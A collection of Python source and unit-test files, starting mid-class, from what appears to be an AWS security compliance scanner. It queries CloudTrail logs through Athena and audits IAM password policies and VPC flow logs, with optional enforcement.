self._logger = getLogger(self.__class__.__name__)
self._boto_athena = boto_athena
self._catalog = "AwsDataCatalog"
self._config = Config()
def create_database(self, database_name: str) -> str:
self._logger.info(f"creating database {database_name}")
return self.run_query(
query=Template(queries.CREATE_DATABASE).substitute(database_name=database_name),
raise_on_failure=exceptions.CreateDatabaseException,
)
def drop_database(self, database_name: str) -> str:
self._logger.info(f"dropping database {database_name}")
return self.run_query(
query=Template(queries.DROP_DATABASE).substitute(database_name=database_name),
raise_on_failure=exceptions.DropDatabaseException,
)
def create_table(self, database: str, account: Account) -> str:
self._logger.info(f"creating table {account.identifier} in database {database}")
return self.run_query(
query=Template(queries.CREATE_TABLE).substitute(
account=account.identifier, cloudtrail_logs_bucket=self._config.cloudtrail_logs_bucket()
),
database=database,
raise_on_failure=exceptions.CreateTableException,
)
def drop_table(self, database: str, table: str) -> str:
self._logger.info(f"dropping table {table} in database {database}")
return self.run_query(
query=Template(queries.DROP_TABLE).substitute(table=table),
database=database,
raise_on_failure=exceptions.DropTableException,
)
def add_partition(self, database: str, account: Account, partition: AwsAthenaDataPartition) -> str:
self._logger.info(f"loading {partition} for table {account.identifier} in database {database}")
return self.run_query(
query=Template(queries.ADD_PARTITION_YEAR_MONTH).substitute(
account=account.identifier,
cloudtrail_logs_bucket=self._config.cloudtrail_logs_bucket(),
region=partition.region,
year=partition.year,
month=partition.month,
),
database=database,
raise_on_failure=exceptions.AddPartitionException,
)
def has_query_completed(self, query_id: str) -> bool:
return self._is_query_state_in(query_id, COMPLETED_STATES)
def has_query_succeeded(self, query_id: str) -> bool:
return self._is_query_state_in(query_id, SUCCESS_STATES)
def get_query_results(self, query_id: str) -> List[Any]:
self._logger.debug(f"fetching results for query {query_id}")
try:
query_result_response = self._boto_athena.get_query_results(QueryExecutionId=query_id)
return list(query_result_response["ResultSet"]["Rows"][1:])
except (BotoCoreError, ClientError) as error:
raise exceptions.GetQueryResultsException(f"query {query_id} results unknown: {error}") from None
def get_query_error(self, query_id: str) -> str:
return str(self._get_query_execution(query_id)["QueryExecution"]["Status"]["StateChangeReason"])
def run_query(
self,
query: str,
database: str = "",
raise_on_failure: Type[Exception] = exceptions.RunQueryException,
) -> str:
sleep(self._config.athena_query_throttling_seconds())
self._logger.debug(f"running query {query}")
try:
query_execution_response = self._boto_athena.start_query_execution(
QueryString=query,
QueryExecutionContext=self._build_exec_context(database),
ResultConfiguration={"OutputLocation": f"s3://{self._config.athena_query_results_bucket()}"},
)
return str(query_execution_response["QueryExecutionId"])
except (BotoCoreError, ClientError) as error:
raise raise_on_failure(f"query execution failure: {error}") from None
def list_tables(self, database: str) -> List[str]:
self._logger.info(f"listing tables in database {database}")
try:
response = self._boto_athena.list_table_metadata(CatalogName=self._catalog, DatabaseName=database)
return [table["Name"] for table in response["TableMetadataList"]]
except (BotoCoreError, ClientError) as error:
raise exceptions.ListTablesException(error) from None
def list_databases(self) -> List[str]:
self._logger.info("listing databases")
try:
response = self._boto_athena.list_databases(CatalogName=self._catalog)
return [db["Name"] for db in response["DatabaseList"]]
except (BotoCoreError, ClientError) as error:
raise exceptions.ListTablesException(error) from None
def _is_query_state_in(self, query_id: str, expected_states: List[str]) -> bool:
return self._get_query_execution(query_id)["QueryExecution"]["Status"]["State"] in expected_states
def _build_exec_context(self, database: str) -> Dict[str, str]:
return {"Catalog": self._catalog, "Database": database} if database else {"Catalog": self._catalog}
def _get_query_execution(self, query_id: str) -> Dict[Any, Any]:
self._logger.debug(f"polling execution state for query {query_id}")
try:
return dict(self._boto_athena.get_query_execution(QueryExecutionId=query_id))
except (BotoCoreError, ClientError) as error:
raise exceptions.UnknownQueryStateException(f"query {query_id} state unknown: {error}") from None
```
#### File: src/data/aws_cloudtrail_types.py
```python
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Dict, Sequence
@dataclass
class Trail:
name: str
s3_bucket_name: str
is_logging: bool
is_multiregion_trail: bool
kms_key_id: str
log_file_validation_enabled: bool
include_global_service_events: bool
event_selectors: Sequence[EventSelector]
def to_trail(trail: Dict[str, Any]) -> Trail:
return Trail(
name=trail["Name"],
s3_bucket_name=trail.get("S3BucketName") or "",
is_logging=False,
is_multiregion_trail=trail["IsMultiRegionTrail"],
kms_key_id=trail.get("KmsKeyId") or "",
log_file_validation_enabled=trail["LogFileValidationEnabled"],
include_global_service_events=trail["IncludeGlobalServiceEvents"],
event_selectors=[],
)
@dataclass
class EventSelector:
read_write_type: str
include_management_events: bool
data_resources: Sequence[DataResource]
def to_event_selector(es: Dict[str, Any]) -> EventSelector:
return EventSelector(
read_write_type=es["ReadWriteType"],
include_management_events=es["IncludeManagementEvents"],
data_resources=[to_data_resource(dr) for dr in es["DataResources"]],
)
@dataclass
class DataResource:
type: str
values: Sequence[str]
def to_data_resource(dr: Dict[str, Any]) -> DataResource:
return DataResource(type=dr["Type"], values=dr["Values"])
```
#### File: src/data/aws_iam_types.py
```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Dict, Optional, Sequence, Set
from src.data import is_list
from src.data.aws_common_types import Tag
from src.data.aws_scanner_exceptions import UnsupportedPolicyDocumentElement
@dataclass
class Role:
name: str
arn: str
assume_policy: Dict[str, Any]
policies: Sequence[Policy]
tags: Sequence[Tag]
def __init__(
self,
name: str,
arn: str,
assume_policy: Dict[str, Any],
policies: Optional[Sequence[Policy]] = None,
tags: Optional[Sequence[Tag]] = None,
):
self.name = name
self.arn = arn
self.assume_policy = assume_policy
self.policies = policies or []
self.tags = tags or []
def to_role(role: Dict[Any, Any]) -> Role:
return Role(
name=role["RoleName"],
arn=role["Arn"],
assume_policy=role["AssumeRolePolicyDocument"],
tags=[Tag(tag["Key"], tag["Value"]) for tag in role["Tags"]] if role.get("Tags") else [],
)
@dataclass
class Policy:
name: str
arn: str
default_version: str
document: Optional[Dict[str, Any]] = None
def doc_equals(self, doc: Dict[str, Any]) -> bool:
unrolled = self._unroll_statements(self.document) if self.document else set()
return unrolled == self._unroll_statements(doc)
def _unroll_statements(self, doc: Dict[str, Any]) -> Set[Statement]:
unrolled = set()
statements = doc["Statement"] if is_list(doc["Statement"]) else [doc["Statement"]]
for s in self._validate_statements(statements):
actions = s["Action"] if is_list(s["Action"]) else [s["Action"]]
resources = s["Resource"] if is_list(s["Resource"]) else [s["Resource"]]
for a in actions:
for r in resources:
unrolled.add(Statement(action=a, resource=r, effect=s["Effect"], condition=str(s.get("Condition"))))
return unrolled
@staticmethod
def _validate_statements(statements: Sequence[Dict[str, Any]]) -> Sequence[Dict[str, Any]]:
unsupported_elements = ["NotAction", "NotResource", "Principal", "NotPrincipal"]
invalid_statements = [s for s in statements if any(element in s for element in unsupported_elements)]
if invalid_statements:
raise UnsupportedPolicyDocumentElement(f"one of {unsupported_elements} found in {invalid_statements}")
return statements
def to_policy(policy: Dict[Any, Any]) -> Policy:
return Policy(name=policy["PolicyName"], arn=policy["Arn"], default_version=policy["DefaultVersionId"])
@dataclass(frozen=True)
class Statement:
action: str
condition: Optional[str]
effect: str
resource: str
@dataclass
class User:
user_name: str
@dataclass
class AccessKey:
id: str
user_name: str
created: datetime
last_used: Optional[datetime] = None
@dataclass
class PasswordPolicy:
minimum_password_length: Optional[int]
require_symbols: Optional[bool]
require_numbers: Optional[bool]
require_uppercase_chars: Optional[bool]
require_lowercase_chars: Optional[bool]
allow_users_to_change_password: Optional[bool]
expire_passwords: Optional[bool]
max_password_age: Optional[int]
password_reuse_prevention: Optional[int]
hard_expiry: Optional[bool]
def to_password_policy(policy_response: Dict[str, Any]) -> PasswordPolicy:
password_policy = policy_response["PasswordPolicy"]
return PasswordPolicy(
minimum_password_length=password_policy.get("MinimumPasswordLength"),
require_symbols=password_policy.get("RequireSymbols"),
require_numbers=password_policy.get("RequireNumbers"),
require_uppercase_chars=password_policy.get("RequireUppercaseCharacters"),
require_lowercase_chars=password_policy.get("RequireLowercaseCharacters"),
allow_users_to_change_password=password_policy.get("AllowUsersToChangePassword"),
expire_passwords=password_policy.get("ExpirePasswords"),
max_password_age=password_policy.get("MaxPasswordAge"),
password_reuse_prevention=password_policy.get("PasswordReusePrevention"),
hard_expiry=password_policy.get("HardExpiry"),
)
```
#### File: platsec-aws-scanner/src/json_serializer.py
```python
import datetime
from json import dumps
from typing import Any
def to_json(obj: Any) -> str:
return dumps(
obj,
default=lambda o: {
k: _datetime_to_string(v) for k, v in vars(o).items() if _is_public(k) and v and not callable(v)
},
)
def _is_public(prop: str) -> bool:
return not prop.startswith("_")
def _datetime_to_string(o: Any) -> Any:
if isinstance(o, datetime.datetime):
return o.isoformat()
else:
return o
```
#### File: src/tasks/aws_athena_cleaner_task.py
```python
from dataclasses import dataclass
from typing import Any, Dict, List
from src.clients.aws_athena_client import AwsAthenaClient
from src.tasks.aws_athena_task import AwsAthenaTask
from src.aws_scanner_config import AwsScannerConfig as Config
@dataclass
class AwsAthenaCleanerTask(AwsAthenaTask):
def __init__(self) -> None:
super().__init__("clean scanner leftovers", Config().athena_account())
def _run_task(self, client: AwsAthenaClient) -> Dict[Any, Any]:
databases = self._list_scanner_databases(client)
dropped_tables = [table for tables in [self._drop_tables(client, db) for db in databases] for table in tables]
dropped_databases = [self._drop_database(client, db) for db in databases]
return {"dropped_tables": dropped_tables, "dropped_databases": dropped_databases}
@staticmethod
def _drop_tables(client: AwsAthenaClient, database: str) -> List[str]:
return [AwsAthenaCleanerTask._drop_table(client, database, table) for table in client.list_tables(database)]
@staticmethod
def _drop_database(client: AwsAthenaClient, database: str) -> str:
client.drop_database(database)
return database
@staticmethod
def _list_scanner_databases(client: AwsAthenaClient) -> List[str]:
return list(filter(lambda db: db.startswith(Config().athena_database_prefix()), client.list_databases()))
@staticmethod
def _drop_table(client: AwsAthenaClient, database: str, table: str) -> str:
client.drop_table(database, table)
return f"{database}.{table}"
```
#### File: src/tasks/aws_athena_task.py
```python
from typing import Any, Dict
from src.clients.aws_athena_client import AwsAthenaClient
from src.tasks.aws_task import AwsTask
class AwsAthenaTask(AwsTask):
def _run_task(self, client: AwsAthenaClient) -> Dict[Any, Any]:
raise NotImplementedError("this is an abstract class")
```
#### File: src/tasks/aws_audit_password_policy_task.py
```python
from typing import Any, Dict
from src.aws_scanner_config import AwsScannerConfig as Config
from src.clients.aws_iam_client import AwsIamClient
from src.data.aws_compliance_actions import UpdatePasswordPolicyAction
from src.data.aws_organizations_types import Account
from src.tasks.aws_task import AwsTask
class AwsAuditPasswordPolicyTask(AwsTask):
def __init__(self, account: Account, enforce: bool) -> None:
super().__init__("audit password policy compliance", account)
self.enforce = enforce
def _run_task(self, client: AwsIamClient) -> Dict[Any, Any]:
reference_policy = Config().iam_password_policy()
current_policy = client.get_account_password_policy()
actions = [] if current_policy == reference_policy else [UpdatePasswordPolicyAction(iam=client)]
action_reports = list(map(lambda a: a.apply() if self.enforce else a.plan(), actions))
return {"password_policy": current_policy, "enforcement_actions": action_reports}
```
#### File: src/tasks/aws_audit_vpc_flow_logs_task.py
```python
from dataclasses import dataclass
from typing import Any, Dict
from src.clients.composite.aws_vpc_client import AwsVpcClient
from src.data.aws_organizations_types import Account
from src.tasks.aws_vpc_task import AwsVpcTask
@dataclass
class AwsAuditVPCFlowLogsTask(AwsVpcTask):
def __init__(self, account: Account, enforce: bool, with_subscription_filter: bool) -> None:
super().__init__("audit VPC flow logs compliance", account, enforce)
self.with_subscription_filter = with_subscription_filter
def _run_task(self, client: AwsVpcClient) -> Dict[Any, Any]:
vpcs = client.list_vpcs()
actions = client.enforcement_actions(vpcs, self.with_subscription_filter)
if self.enforce:
apply = [a.apply() for a in actions]
return {"vpcs": vpcs, "enforcement_actions": apply}
else:
plans = [a.plan() for a in actions]
return {"vpcs": vpcs, "enforcement_actions": plans}
```
#### File: src/tasks/aws_task.py
```python
from typing import Any, Dict
from logging import getLogger
from src.data.aws_task_report import AwsTaskReport
from src.data.aws_organizations_types import Account
class AwsTask:
def __init__(self, description: str, account: Account):
self._logger = getLogger(self.__class__.__name__)
self._description = description
self._account = account
def run(self, client: Any) -> AwsTaskReport:
self._logger.info(f"running {self}")
return AwsTaskReport(
account=self._account, description=self._description, partition=None, results=self._run_task(client)
)
@property
def account(self) -> Account:
return self._account
def _run_task(self, client: Any) -> Dict[Any, Any]:
raise NotImplementedError("this is an abstract class")
def __str__(self) -> str:
return f"task '{self._description}' for '{self._account}'"
```
#### File: src/tasks/aws_vpc_task.py
```python
from typing import Any, Dict
from src.clients.composite.aws_vpc_client import AwsVpcClient
from src.data.aws_organizations_types import Account
from src.tasks.aws_task import AwsTask
class AwsVpcTask(AwsTask):
def __init__(self, description: str, account: Account, enforce: bool):
super().__init__(description, account)
self._enforce = enforce
@property
def enforce(self) -> bool:
return self._enforce
def _run_task(self, client: AwsVpcClient) -> Dict[Any, Any]:
raise NotImplementedError("this is an abstract class")
```
#### File: clients/composite/test_aws_central_logging_client.py
```python
from unittest.mock import Mock
from src.clients.composite.aws_central_logging_client import AwsCentralLoggingClient
from tests.test_types_generator import account, bucket, key
def client(s3: Mock = Mock(), kms: Mock = Mock(), org: Mock = Mock()) -> AwsCentralLoggingClient:
return AwsCentralLoggingClient(s3, kms, org)
def test_get_event_bucket() -> None:
the_policy = {"banana": 1}
s3_client = Mock(
get_bucket_policy=Mock(side_effect=lambda b: the_policy if b == "cloudtrail-logs-bucket" else None)
)
actual_bucket = client(s3=s3_client).get_event_bucket()
assert actual_bucket == bucket(name="cloudtrail-logs-bucket", policy=the_policy)
def test_get_event_bucket_does_not_exist() -> None:
s3_client = Mock(get_bucket_policy=Mock(return_value=None))
assert client(s3=s3_client).get_event_bucket() is None
def test_get_event_cmk() -> None:
expected_key = key(id="74356589")
kms_client = Mock(find_key=Mock(side_effect=lambda k: expected_key if k == "74356589" else None))
actual_key = client(kms=kms_client).get_event_cmk()
assert actual_key == expected_key
def test_get_event_cmk_not_found() -> None:
kms_client = Mock(find_key=Mock(return_value=None))
assert client(kms=kms_client).get_event_cmk() is None
def test_get_all_accounts() -> None:
expected_accounts = [account("123456", "test-acc-01"), account("123456", "test-acc-01")]
org_client = Mock(get_all_accounts=Mock(return_value=expected_accounts))
assert client(org=org_client).get_all_accounts() == expected_accounts
```
#### File: clients/composite/test_aws_vpc_client.py
```python
from __future__ import annotations
from typing import Sequence, Optional, Type, Dict, Any
from src.data.aws_iam_types import Role, Policy
from src.data.aws_logs_types import LogGroup
from src.data.aws_scanner_exceptions import IamException
from unittest import TestCase
from unittest.mock import Mock
from src.clients.aws_ec2_client import AwsEC2Client
from src.clients.aws_iam_client import AwsIamClient
from src.clients.aws_kms_client import AwsKmsClient
from src.clients.aws_logs_client import AwsLogsClient
from src.clients.composite.aws_vpc_client import AwsVpcClient
from src.data.aws_compliance_actions import (
ComplianceAction,
)
from tests.test_types_generator import (
create_flow_log_action,
create_flow_log_delivery_role_action,
create_vpc_log_group_action,
delete_flow_log_action,
delete_flow_log_delivery_role_action,
delete_vpc_log_group_subscription_filter_action,
flow_log,
key,
log_group,
policy,
put_vpc_log_group_subscription_filter_action,
put_vpc_log_group_retention_policy_action,
role,
subscription_filter,
tag_flow_log_delivery_role_action,
tag_vpc_log_group_action,
vpc,
tag,
)
class TestAwsVpcClient(TestCase):
def test_list_vpcs(self) -> None:
a_key = key()
log_role = role(arn=str(flow_log().deliver_log_role_arn))
group = log_group(kms_key_id=a_key.id, kms_key=a_key)
expected_enriched_vpcs = [
vpc(
id="default-log-group-1",
flow_logs=[flow_log(deliver_log_role_arn=None, deliver_log_role=None, log_group=group)],
),
vpc(id="default-log-group-2", flow_logs=[flow_log(deliver_log_role=log_role, log_group_name=None)]),
]
client = AwsVpcClientBuilder()
client.with_default_vpc()
client.with_default_log_group()
client.with_roles([role(), role(arn=str(flow_log().deliver_log_role_arn))])
enriched = client.build().list_vpcs()
self.assertEqual(len(enriched), 2)
self.assertEqual(expected_enriched_vpcs, enriched)
class TestAwsLogDeliveryRoleCompliance(TestCase):
def test_find_flow_log_delivery_role(self) -> None:
delivery_role = role(name="vpc_flow_log_role")
client = AwsVpcClientBuilder().with_roles([delivery_role])
self.assertEqual(delivery_role, client.build()._find_flow_log_delivery_role())
def test_flow_log_role_compliant(self) -> None:
delivery_role = role(
assume_policy={"Statement": [{"Action": "sts:AssumeRole"}]},
policies=[policy(document={"Statement": [{"Effect": "Allow", "Action": ["logs:*"], "Resource": "*"}]})],
)
client = AwsVpcClientBuilder().build()
self.assertTrue(client._is_flow_log_role_compliant(delivery_role))
def test_flow_log_role_not_compliant(self) -> None:
invalid_assume_policy = role(
assume_policy={"Statement": [{"Action": "sts:other"}]},
policies=[policy(document={"Statement": [{"Effect": "Allow", "Action": ["logs:PutLogEvents"]}]})],
)
invalid_policy_document = role(
assume_policy={"Statement": [{"Action": "sts:AssumeRole"}]},
policies=[policy(document={"Statement": [{"Effect": "Allow", "Action": ["logs:bla"], "Resource": "*"}]})],
)
missing_policy_document = role(assume_policy={"Statement": [{"Action": "sts:AssumeRole"}]}, policies=[])
client = AwsVpcClientBuilder().build()
self.assertFalse(client._is_flow_log_role_compliant(invalid_assume_policy))
self.assertFalse(client._is_flow_log_role_compliant(invalid_policy_document))
self.assertFalse(client._is_flow_log_role_compliant(missing_policy_document))
def test_delivery_role_policy_exists(self) -> None:
client = AwsVpcClientBuilder()
expected_policy = policy(name="delivery_role_policy")
client.with_policies([expected_policy])
self.assertTrue(client.build()._delivery_role_policy_exists())
def test_delivery_role_policy_not_found(self) -> None:
client = AwsVpcClientBuilder()
client.with_policies([])
self.assertFalse(client.build()._delivery_role_policy_exists())
class TestAwsFlowLogCompliance(TestCase):
@staticmethod
def client() -> AwsVpcClient:
return AwsVpcClientBuilder().build()
def test_flow_log_centralised(self) -> None:
self.assertTrue(self.client()._is_flow_log_centralised(flow_log(log_group_name="/vpc/flow_log")))
def test_flow_log_not_centralised(self) -> None:
self.assertFalse(self.client()._is_flow_log_centralised(flow_log(log_group_name=None)))
self.assertFalse(self.client()._is_flow_log_centralised(flow_log(log_group_name="/vpc/something_else")))
def test_flow_log_not_misconfigured(self) -> None:
self.assertFalse(self.client()._is_flow_log_misconfigured(flow_log()))
self.assertFalse(self.client()._is_flow_log_misconfigured(flow_log(log_group_name="/vpc/something_else")))
def test_flow_log_misconfigured(self) -> None:
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(status="a")))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(traffic_type="b")))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(log_format="c")))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(deliver_log_role_arn=None)))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(deliver_log_role_arn="bla")))
class TestAwsEnforcementActions(TestCase):
@staticmethod
def mock_action(action: Type[ComplianceAction], expected_client: Mock, applied_action: Mock) -> Mock:
return Mock(spec=action, apply=Mock(side_effect=lambda c: applied_action if c == expected_client else None))
def test_do_nothing_when_all_correct(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual([], client.build().enforcement_actions([vpc()], with_subscription_filter=True))
def test_create_vpc_flow_logs(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[create_flow_log_action(vpc_id="vpc-1234")],
client.build().enforcement_actions([vpc(flow_logs=[])], with_subscription_filter=True),
)
def test_vpc_delete_redundant_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[delete_flow_log_action(flow_log_id="2"), delete_flow_log_action(flow_log_id="3")],
client.build().enforcement_actions(
[
vpc(
flow_logs=[
flow_log("1"), # the one we want to keep
flow_log("2"), # duplicate
flow_log("3"), # duplicate
flow_log(id="unrelated_flow_log", log_group_name="unrelated flow log"),
]
)
],
with_subscription_filter=True,
),
)
def test_vpc_delete_misconfigured_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[delete_flow_log_action(flow_log_id="1"), delete_flow_log_action(flow_log_id="3")],
client.build().enforcement_actions(
[vpc(flow_logs=[flow_log("1", status="a"), flow_log("2"), flow_log("3")])],
with_subscription_filter=True,
),
)
def test_vpc_create_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[create_flow_log_action(vpc_id="vpc-1")],
client.build().enforcement_actions(
[vpc(id="vpc-1", flow_logs=[flow_log(log_group_name="a")])], with_subscription_filter=True
),
)
def test_vpc_delete_misconfigured_and_create_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[delete_flow_log_action(flow_log_id="1"), create_flow_log_action(vpc_id="vpc-a")],
client.build().enforcement_actions(
[vpc(id="vpc-a", flow_logs=[flow_log(id="1", status="a")])], with_subscription_filter=True
),
)
def test_create_delivery_role_action_when_role_is_missing(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([])
client.with_policies([])
self.assertEqual(
[create_flow_log_delivery_role_action(iam=client.iam), tag_flow_log_delivery_role_action(iam=client.iam)],
client.build()._delivery_role_enforcement_actions(),
)
def test_delete_and_create_delivery_role_action_when_role_is_missing_and_policy_exists(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([])
client.with_policies([policy(name="delivery_role_policy")])
self.assertEqual(
[
delete_flow_log_delivery_role_action(iam=client.iam),
create_flow_log_delivery_role_action(iam=client.iam),
tag_flow_log_delivery_role_action(iam=client.iam),
],
client.build()._delivery_role_enforcement_actions(),
)
def test_delete_and_create_delivery_role_action_when_role_is_not_compliant(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role(name="vpc_flow_log_role", policies=[])])
self.assertEqual(
[
delete_flow_log_delivery_role_action(iam=client.iam),
create_flow_log_delivery_role_action(iam=client.iam),
tag_flow_log_delivery_role_action(iam=client.iam),
],
client.build()._delivery_role_enforcement_actions(),
)
def test_tag_flow_log_delivery_role_when_required_tags_missing(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role(name="vpc_flow_log_role", tags=[tag("unrelated_tag", "some value")])])
self.assertEqual(
[tag_flow_log_delivery_role_action(iam=client.iam)],
client.build()._delivery_role_enforcement_actions(),
)
def test_create_central_vpc_log_group_when_missing_with_subscription_filter(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([])
actions = client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True)
self.assertEqual(
[
create_vpc_log_group_action(logs=client.logs),
put_vpc_log_group_retention_policy_action(logs=client.logs),
tag_vpc_log_group_action(logs=client.logs),
put_vpc_log_group_subscription_filter_action(logs=client.logs),
],
actions,
)
def test_create_central_vpc_log_group_without_subscription_filter(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([])
actions = client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=False)
self.assertEqual(
[
create_vpc_log_group_action(logs=client.logs),
put_vpc_log_group_retention_policy_action(logs=client.logs),
tag_vpc_log_group_action(logs=client.logs),
],
actions,
)
def test_put_subscription_filter_when_central_vpc_log_group_is_not_compliant(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(subscription_filters=[], default_kms_key=True)])
self.assertEqual(
[put_vpc_log_group_subscription_filter_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_put_retention_policy_when_central_vpc_log_group_does_not_have_one(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(retention_days=None, default_kms_key=True)])
self.assertEqual(
[put_vpc_log_group_retention_policy_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_put_retention_policy_when_central_vpc_log_group_retention_differs_from_config(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(retention_days=21, default_kms_key=True)])
self.assertEqual(
[put_vpc_log_group_retention_policy_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_tag_vpc_log_group_when_tags_missing(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(tags=[tag("unrelated_tag", "1")], default_kms_key=True)])
self.assertEqual(
[tag_vpc_log_group_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_no_central_vpc_log_group_action_when_log_group_is_compliant(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
self.assertEqual([], client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True))
def test_delete_subscription_filter_when_exists_and_not_required(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
self.assertEqual(
[delete_vpc_log_group_subscription_filter_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=False),
)
class TestLogGroupCompliance(TestCase):
def test_central_vpc_log_group(self) -> None:
self.assertTrue(
AwsVpcClientBuilder()
.build()
._is_central_vpc_log_group(
log_group(
name="/vpc/flow_log",
subscription_filters=[
subscription_filter(
filter_pattern="[version, account_id, interface_id]",
destination_arn="arn:aws:logs:::destination:central",
)
],
)
)
)
def test_log_group_is_not_vpc_central(self) -> None:
client = AwsVpcClientBuilder().build()
self.assertFalse(client._is_central_vpc_log_group(log_group(name="/vpc/something_else")))
self.assertFalse(client._is_central_vpc_log_group(log_group(subscription_filters=[])))
self.assertFalse(
client._is_central_vpc_log_group(
log_group(subscription_filters=[subscription_filter(filter_pattern="something")])
)
)
self.assertFalse(
client._is_central_vpc_log_group(
log_group(subscription_filters=[subscription_filter(destination_arn="somewhere")])
)
)
class AwsVpcClientBuilder(TestCase):
def __init__(self) -> None:
super().__init__()
self.ec2 = Mock(spec=AwsEC2Client, wraps=AwsEC2Client(Mock()))
self.iam = Mock(spec=AwsIamClient, wraps=AwsIamClient(Mock()))
self.logs = Mock(spec=AwsLogsClient, wraps=AwsLogsClient(Mock()))
self.kms = Mock(spec=AwsKmsClient, wraps=AwsKmsClient(Mock()))
def with_default_vpc(self) -> AwsVpcClientBuilder:
vpcs = [
vpc(id="default-log-group-1", flow_logs=[flow_log(deliver_log_role_arn=None)]),
vpc(id="default-log-group-2", flow_logs=[flow_log(log_group_name=None)]),
]
self.ec2.list_vpcs.return_value = vpcs
return self
def with_default_key(self) -> AwsVpcClientBuilder:
self.kms.get_key.side_effect = lambda k: key() if k == key().id else self.fail(f"expected {key().id}, got {k}")
return self
def with_default_log_group(self) -> AwsVpcClientBuilder:
self.with_log_groups([log_group(kms_key_id=key().id)])
return self
def with_log_groups(self, log_groups: Sequence[LogGroup]) -> AwsVpcClientBuilder:
def describe_log_groups(name_prefix: str) -> Sequence[LogGroup]:
return list(filter(lambda log_group: log_group.name.startswith(name_prefix), log_groups))
self.logs.describe_log_groups.side_effect = describe_log_groups
self.with_default_key()
return self
def with_roles(self, roles: Sequence[Role]) -> AwsVpcClientBuilder:
def get_role(name: str) -> Optional[Role]:
result = next(filter(lambda a_role: a_role.name == name, roles), None)
if result is None:
raise IamException(f"cannot find {name} in {roles}")
return result
def find_role_by_name(name: str) -> Optional[Role]:
result = filter(lambda role: role.name == name, roles)
return next(result, None)
def find_role_by_arn(arn: str) -> Optional[Role]:
result = filter(lambda role: role.arn == arn, roles)
return next(result, None)
self.iam.get_role.side_effect = get_role
self.iam.find_role.side_effect = find_role_by_name
self.iam.find_role_by_arn.side_effect = find_role_by_arn
return self
def with_policies(self, policies: Sequence[Policy]) -> AwsVpcClientBuilder:
def find_policy_arn(name: str) -> Optional[str]:
result = next(filter(lambda p: p.name == name, policies), None)
return result.arn if result else None
self.iam.find_policy_arn.side_effect = find_policy_arn
return self
def build(self) -> AwsVpcClient:
return AwsVpcClient(self.ec2, self.iam, self.logs, self.kms)
def with_create_role(self, expected_role: Role) -> AwsVpcClientBuilder:
def create_role(name: str, assume_policy: Dict[str, Any]) -> Role:
self.assertEqual(expected_role.name, name, "The expected mocked role name did not match what was called")
self.assertEqual(
expected_role.assume_policy,
assume_policy,
"The expected mocked role assume_policy did not match what was called",
)
return expected_role
self.iam.create_role.side_effect = create_role
return self
def with_create_policies(self, expected_policies: Sequence[Policy]) -> AwsVpcClientBuilder:
def create_policy(name: str, document: Dict[str, Any]) -> Policy:
found_policies: Sequence[Policy] = list(filter(lambda p: p.name == name, expected_policies))
self.assertTrue(
len(found_policies) == 1,
f"did not find a unique policy with name '{name}' in expected policies {expected_policies}",
)
found_policy: Policy = next(iter(found_policies))
self.assertEqual(
found_policy.document, document, "The expected mocked policy document did not match what was called"
)
return found_policy
self.iam.create_policy.side_effect = create_policy
return self
def with_attach_role_policy(self, expected_role: Role) -> AwsVpcClientBuilder:
def attach_role_policy(role: Role, policy_arn: str) -> None:
self.assertEqual(role.name, expected_role.name)
self.assertIn(policy_arn, [p.arn for p in expected_role.policies])
return None
self.iam.attach_role_policy.side_effect = attach_role_policy
return self
def with_create_flow_logs(self) -> AwsVpcClientBuilder:
self.ec2.create_flow_logs.return_value = None
return self
```
#### File: tests/clients/test_aws_athena_client.py
```python
from unittest import TestCase
from unittest.mock import Mock, call, patch
from typing import Any, Dict, Type
from src.data import aws_scanner_exceptions as exceptions
from src.clients.aws_athena_client import AwsAthenaClient
from tests.test_types_generator import account, partition
class TestWaitFor(TestCase):
def test_wait_for_completion(self) -> None:
query_id = "8759-2768-2364"
mock_has_query_completed = Mock(side_effect=[False, False, True])
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_completed", mock_has_query_completed
):
AwsAthenaClient(Mock())._wait_for_completion(query_id, 60)
mock_has_query_completed.assert_has_calls([call(query_id) for _ in range(3)])
